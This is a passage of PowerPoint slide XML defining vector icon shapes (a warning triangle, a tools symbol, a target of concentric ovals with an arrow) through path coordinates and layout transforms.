              <a:gd name="T51" fmla="*/ 435 h 445"/>
              <a:gd name="T52" fmla="*/ 426 w 498"/>
              <a:gd name="T53" fmla="*/ 417 h 445"/>
              <a:gd name="T54" fmla="*/ 426 w 498"/>
              <a:gd name="T55" fmla="*/ 400 h 445"/>
              <a:gd name="T56" fmla="*/ 222 w 498"/>
              <a:gd name="T57" fmla="*/ 160 h 445"/>
              <a:gd name="T58" fmla="*/ 497 w 498"/>
              <a:gd name="T59" fmla="*/ 63 h 445"/>
              <a:gd name="T60" fmla="*/ 497 w 498"/>
              <a:gd name="T61" fmla="*/ 63 h 445"/>
              <a:gd name="T62" fmla="*/ 479 w 498"/>
              <a:gd name="T63" fmla="*/ 54 h 445"/>
              <a:gd name="T64" fmla="*/ 461 w 498"/>
              <a:gd name="T65" fmla="*/ 89 h 445"/>
              <a:gd name="T66" fmla="*/ 408 w 498"/>
              <a:gd name="T67" fmla="*/ 107 h 445"/>
              <a:gd name="T68" fmla="*/ 399 w 498"/>
              <a:gd name="T69" fmla="*/ 63 h 445"/>
              <a:gd name="T70" fmla="*/ 417 w 498"/>
              <a:gd name="T71" fmla="*/ 19 h 445"/>
              <a:gd name="T72" fmla="*/ 408 w 498"/>
              <a:gd name="T73" fmla="*/ 10 h 445"/>
              <a:gd name="T74" fmla="*/ 337 w 498"/>
              <a:gd name="T75" fmla="*/ 72 h 445"/>
              <a:gd name="T76" fmla="*/ 319 w 498"/>
              <a:gd name="T77" fmla="*/ 151 h 445"/>
              <a:gd name="T78" fmla="*/ 284 w 498"/>
              <a:gd name="T79" fmla="*/ 187 h 445"/>
              <a:gd name="T80" fmla="*/ 319 w 498"/>
              <a:gd name="T81" fmla="*/ 231 h 445"/>
              <a:gd name="T82" fmla="*/ 364 w 498"/>
              <a:gd name="T83" fmla="*/ 187 h 445"/>
              <a:gd name="T84" fmla="*/ 408 w 498"/>
              <a:gd name="T85" fmla="*/ 178 h 445"/>
              <a:gd name="T86" fmla="*/ 488 w 498"/>
              <a:gd name="T87" fmla="*/ 143 h 445"/>
              <a:gd name="T88" fmla="*/ 497 w 498"/>
              <a:gd name="T89" fmla="*/ 63 h 445"/>
              <a:gd name="T90" fmla="*/ 72 w 498"/>
              <a:gd name="T91" fmla="*/ 400 h 445"/>
              <a:gd name="T92" fmla="*/ 72 w 498"/>
              <a:gd name="T93" fmla="*/ 400 h 445"/>
              <a:gd name="T94" fmla="*/ 72 w 498"/>
              <a:gd name="T95" fmla="*/ 417 h 445"/>
              <a:gd name="T96" fmla="*/ 89 w 498"/>
              <a:gd name="T97" fmla="*/ 444 h 445"/>
              <a:gd name="T98" fmla="*/ 107 w 498"/>
              <a:gd name="T99" fmla="*/ 435 h 445"/>
              <a:gd name="T100" fmla="*/ 231 w 498"/>
              <a:gd name="T101" fmla="*/ 320 h 445"/>
              <a:gd name="T102" fmla="*/ 195 w 498"/>
              <a:gd name="T103" fmla="*/ 275 h 445"/>
              <a:gd name="T104" fmla="*/ 72 w 498"/>
              <a:gd name="T105" fmla="*/ 400 h 4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98" h="445">
                <a:moveTo>
                  <a:pt x="80" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="80" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="97" y="134"/>
                  <a:pt x="116" y="143"/>
                  <a:pt x="142" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="151" y="178"/>
                  <a:pt x="151" y="169"/>
                  <a:pt x="151" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="169"/>
                  <a:pt x="186" y="134"/>
                  <a:pt x="195" y="134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="134"/>
                  <a:pt x="195" y="134"/>
                  <a:pt x="195" y="125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="125"/>
                  <a:pt x="178" y="116"/>
                  <a:pt x="178" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="45"/>
                  <a:pt x="301" y="10"/>
                  <a:pt x="275" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="0"/>
                  <a:pt x="204" y="0"/>
                  <a:pt x="195" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="10"/>
                  <a:pt x="125" y="36"/>
                  <a:pt x="107" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="72"/>
                  <a:pt x="72" y="81"/>
                  <a:pt x="72" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="89"/>
                  <a:pt x="72" y="107"/>
                  <a:pt x="53" y="116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="125"/>
                  <a:pt x="27" y="116"/>
                  <a:pt x="18" y="125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="134"/>
                  <a:pt x="9" y="134"/>
                  <a:pt x="0" y="143"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="187"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="196"/>
                  <a:pt x="44" y="196"/>
                  <a:pt x="53" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="187"/>
                  <a:pt x="62" y="178"/>
                  <a:pt x="72" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72" y="178"/>
                  <a:pt x="72" y="151"/>
                  <a:pt x="80" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="222" y="160"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="222" y="160"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="160"/>
                  <a:pt x="213" y="160"/>
                  <a:pt x="213" y="160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178" y="187"/>
                  <a:pt x="178" y="187"/>
                  <a:pt x="178" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="196"/>
                  <a:pt x="169" y="196"/>
                  <a:pt x="169" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="435"/>
                  <a:pt x="381" y="435"/>
                  <a:pt x="381" y="435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="444"/>
                  <a:pt x="391" y="444"/>
                  <a:pt x="399" y="435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="417"/>
                  <a:pt x="426" y="417"/>
                  <a:pt x="426" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="408"/>
                  <a:pt x="426" y="400"/>
                  <a:pt x="426" y="400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="222" y="160"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="497" y="63"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="497" y="63"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="488" y="45"/>
                  <a:pt x="488" y="54"/>
                  <a:pt x="479" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="63"/>
                  <a:pt x="461" y="81"/>
                  <a:pt x="461" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="452" y="107"/>
                  <a:pt x="435" y="125"/>
                  <a:pt x="408" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="81"/>
                  <a:pt x="391" y="72"/>
                  <a:pt x="399" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="54"/>
                  <a:pt x="417" y="28"/>
                  <a:pt x="417" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="19"/>
                  <a:pt x="417" y="10"/>
                  <a:pt x="408" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="19"/>
                  <a:pt x="346" y="36"/>
                  <a:pt x="337" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="98"/>
                  <a:pt x="346" y="125"/>
                  <a:pt x="319" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="284" y="187"/>
                  <a:pt x="284" y="187"/>
                  <a:pt x="284" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="231"/>
                  <a:pt x="319" y="231"/>
                  <a:pt x="319" y="231"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="364" y="187"/>
                  <a:pt x="364" y="187"/>
                  <a:pt x="364" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="178"/>
                  <a:pt x="391" y="169"/>
                  <a:pt x="408" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="452" y="187"/>
                  <a:pt x="470" y="169"/>
                  <a:pt x="488" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="497" y="116"/>
                  <a:pt x="497" y="72"/>
                  <a:pt x="497" y="63"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="72" y="400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="72" y="400"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="408"/>
                  <a:pt x="62" y="417"/>
                  <a:pt x="72" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="444"/>
                  <a:pt x="89" y="444"/>
                  <a:pt x="89" y="444"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97" y="444"/>
                  <a:pt x="107" y="444"/>
                  <a:pt x="107" y="435"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231" y="320"/>
                  <a:pt x="231" y="320"/>
                  <a:pt x="231" y="320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="275"/>
                  <a:pt x="195" y="275"/>
                  <a:pt x="195" y="275"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72" y="4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lIns="45712" tIns="22856" rIns="45712" bIns="22856" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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4" name="Freeform 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1489CFD-AD0D-482F-92D3-C2A054A8826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940096" y="4005999"/>
            <a:ext cx="365207" cy="314764"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 415925 w 256"/>
              <a:gd name="T1" fmla="*/ 324988 h 212"/>
              <a:gd name="T2" fmla="*/ 396429 w 256"/>
              <a:gd name="T3" fmla="*/ 344487 h 212"/>
              <a:gd name="T4" fmla="*/ 396429 w 256"/>
              <a:gd name="T5" fmla="*/ 344487 h 212"/>
              <a:gd name="T6" fmla="*/ 19496 w 256"/>
              <a:gd name="T7" fmla="*/ 344487 h 212"/>
              <a:gd name="T8" fmla="*/ 19496 w 256"/>
              <a:gd name="T9" fmla="*/ 344487 h 212"/>
              <a:gd name="T10" fmla="*/ 19496 w 256"/>
              <a:gd name="T11" fmla="*/ 344487 h 212"/>
              <a:gd name="T12" fmla="*/ 0 w 256"/>
              <a:gd name="T13" fmla="*/ 324988 h 212"/>
              <a:gd name="T14" fmla="*/ 3249 w 256"/>
              <a:gd name="T15" fmla="*/ 313613 h 212"/>
              <a:gd name="T16" fmla="*/ 3249 w 256"/>
              <a:gd name="T17" fmla="*/ 313613 h 212"/>
              <a:gd name="T18" fmla="*/ 191715 w 256"/>
              <a:gd name="T19" fmla="*/ 8125 h 212"/>
              <a:gd name="T20" fmla="*/ 191715 w 256"/>
              <a:gd name="T21" fmla="*/ 8125 h 212"/>
              <a:gd name="T22" fmla="*/ 207963 w 256"/>
              <a:gd name="T23" fmla="*/ 0 h 212"/>
              <a:gd name="T24" fmla="*/ 224210 w 256"/>
              <a:gd name="T25" fmla="*/ 9750 h 212"/>
              <a:gd name="T26" fmla="*/ 224210 w 256"/>
              <a:gd name="T27" fmla="*/ 9750 h 212"/>
              <a:gd name="T28" fmla="*/ 412676 w 256"/>
              <a:gd name="T29" fmla="*/ 315238 h 212"/>
              <a:gd name="T30" fmla="*/ 412676 w 256"/>
              <a:gd name="T31" fmla="*/ 315238 h 212"/>
              <a:gd name="T32" fmla="*/ 415925 w 256"/>
              <a:gd name="T33" fmla="*/ 324988 h 212"/>
              <a:gd name="T34" fmla="*/ 233958 w 256"/>
              <a:gd name="T35" fmla="*/ 110496 h 212"/>
              <a:gd name="T36" fmla="*/ 207963 w 256"/>
              <a:gd name="T37" fmla="*/ 84497 h 212"/>
              <a:gd name="T38" fmla="*/ 181967 w 256"/>
              <a:gd name="T39" fmla="*/ 110496 h 212"/>
              <a:gd name="T40" fmla="*/ 181967 w 256"/>
              <a:gd name="T41" fmla="*/ 207992 h 212"/>
              <a:gd name="T42" fmla="*/ 207963 w 256"/>
              <a:gd name="T43" fmla="*/ 233991 h 212"/>
              <a:gd name="T44" fmla="*/ 233958 w 256"/>
              <a:gd name="T45" fmla="*/ 207992 h 212"/>
              <a:gd name="T46" fmla="*/ 233958 w 256"/>
              <a:gd name="T47" fmla="*/ 110496 h 212"/>
              <a:gd name="T48" fmla="*/ 207963 w 256"/>
              <a:gd name="T49" fmla="*/ 253490 h 212"/>
              <a:gd name="T50" fmla="*/ 181967 w 256"/>
              <a:gd name="T51" fmla="*/ 279489 h 212"/>
              <a:gd name="T52" fmla="*/ 207963 w 256"/>
              <a:gd name="T53" fmla="*/ 305488 h 212"/>
              <a:gd name="T54" fmla="*/ 233958 w 256"/>
              <a:gd name="T55" fmla="*/ 279489 h 212"/>
              <a:gd name="T56" fmla="*/ 207963 w 256"/>
              <a:gd name="T57" fmla="*/ 253490 h 21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56" h="212">
                <a:moveTo>
                  <a:pt x="256" y="200"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="207"/>
                  <a:pt x="251" y="212"/>
                  <a:pt x="244" y="212"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="244" y="212"/>
                  <a:pt x="244" y="212"/>
                  <a:pt x="244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5" y="212"/>
                  <a:pt x="0" y="207"/>
                  <a:pt x="0" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="198"/>
                  <a:pt x="1" y="195"/>
                  <a:pt x="2" y="193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="193"/>
                  <a:pt x="2" y="193"/>
                  <a:pt x="2" y="193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5"/>
                  <a:pt x="118" y="5"/>
                  <a:pt x="118" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="2"/>
                  <a:pt x="124" y="0"/>
                  <a:pt x="128" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132" y="0"/>
                  <a:pt x="136" y="2"/>
                  <a:pt x="138" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138" y="6"/>
                  <a:pt x="138" y="6"/>
                  <a:pt x="138" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="194"/>
                  <a:pt x="254" y="194"/>
                  <a:pt x="254" y="194"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="194"/>
                  <a:pt x="254" y="194"/>
                  <a:pt x="254" y="194"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255" y="196"/>
                  <a:pt x="256" y="198"/>
                  <a:pt x="256" y="200"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="144" y="68"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="59"/>
                  <a:pt x="137" y="52"/>
                  <a:pt x="128" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="52"/>
                  <a:pt x="112" y="59"/>
                  <a:pt x="112" y="68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12" y="137"/>
                  <a:pt x="119" y="144"/>
                  <a:pt x="128" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137" y="144"/>
                  <a:pt x="144" y="137"/>
                  <a:pt x="144" y="128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="144" y="68"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="128" y="156"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="156"/>
                  <a:pt x="112" y="163"/>
                  <a:pt x="112" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112" y="181"/>
                  <a:pt x="119" y="188"/>
                  <a:pt x="128" y="188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137" y="188"/>
                  <a:pt x="144" y="181"/>
                  <a:pt x="144" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="163"/>
                  <a:pt x="137" y="156"/>
                  <a:pt x="128" y="156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chemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2735" name="Group 2734">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D2E4A6-EAE4-4918-B3D8-1E62A793B48C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="381000" y="1181100"/>
            <a:ext cx="11430000" cy="3524250"/>
            <a:chOff x="609600" y="1047750"/>
            <a:chExt cx="11430000" cy="3524250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2058" name="Picture 5" descr="F:\Icons\Icons\Untitled-17.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A234FE-D17F-4E25-84EC-9CFC777915BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0">
              <a:picLocks noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print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20760211" flipH="1">
              <a:off x="9152711" y="2765681"/>
              <a:ext cx="1280160" cy="123444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059" name="Group 2058">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1848CB70-2FF7-4305-A0CE-5920EB36546B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3841823" y="1299180"/>
              <a:ext cx="2333393" cy="2329922"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2727" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38606AF5-C89C-46ED-8920-C73DA34DCA41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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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28" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD52CBE-E6C3-4BBB-9F53-44072B88C68D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74661" y="949014"/>
                <a:ext cx="2104624" cy="210149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29" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC45254D-8C4F-4487-A547-F12D81AB6EC5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342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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30" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F951BA8-FF4A-451F-8265-AFAB1177615E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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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31" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAFE353-4C45-4634-9449-F08490226B12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676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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32" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F54FBAA2-CECA-480A-A800-58D7EBB66B3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860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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33" name="Oval 2732">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E85516B2-BF6B-44E3-824C-F428D51DBB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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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060" name="Group 2234">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0176EB7-3EF4-4438-B20A-07E1B2CA938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033192" y="1951038"/>
              <a:ext cx="641350" cy="192087"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2723" name="Freeform 2235">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F0F6B66-345B-4C00-8AB3-CB189504411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28" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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24" name="Freeform 2236">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7521633-0C04-4BB1-92D4-42561261039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924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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25" name="Freeform 2237">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E48459AE-4EAD-4AD8-A002-C9349EF2BFA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518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134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26" name="Freeform 2238">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E73F5E-0364-40F8-82FC-B377B701DEC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28" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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2061" name="Freeform 824">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{328B753B-66E5-4315-9877-8F9B2A46B65A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7623992" y="2097088"/>
              <a:ext cx="577850" cy="153987"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5150 w 5150"/>
                <a:gd name="T1" fmla="*/ 1380 h 1380"/>
                <a:gd name="T2" fmla="*/ 0 w 5150"/>
                <a:gd name="T3" fmla="*/ 0 h 1380"/>
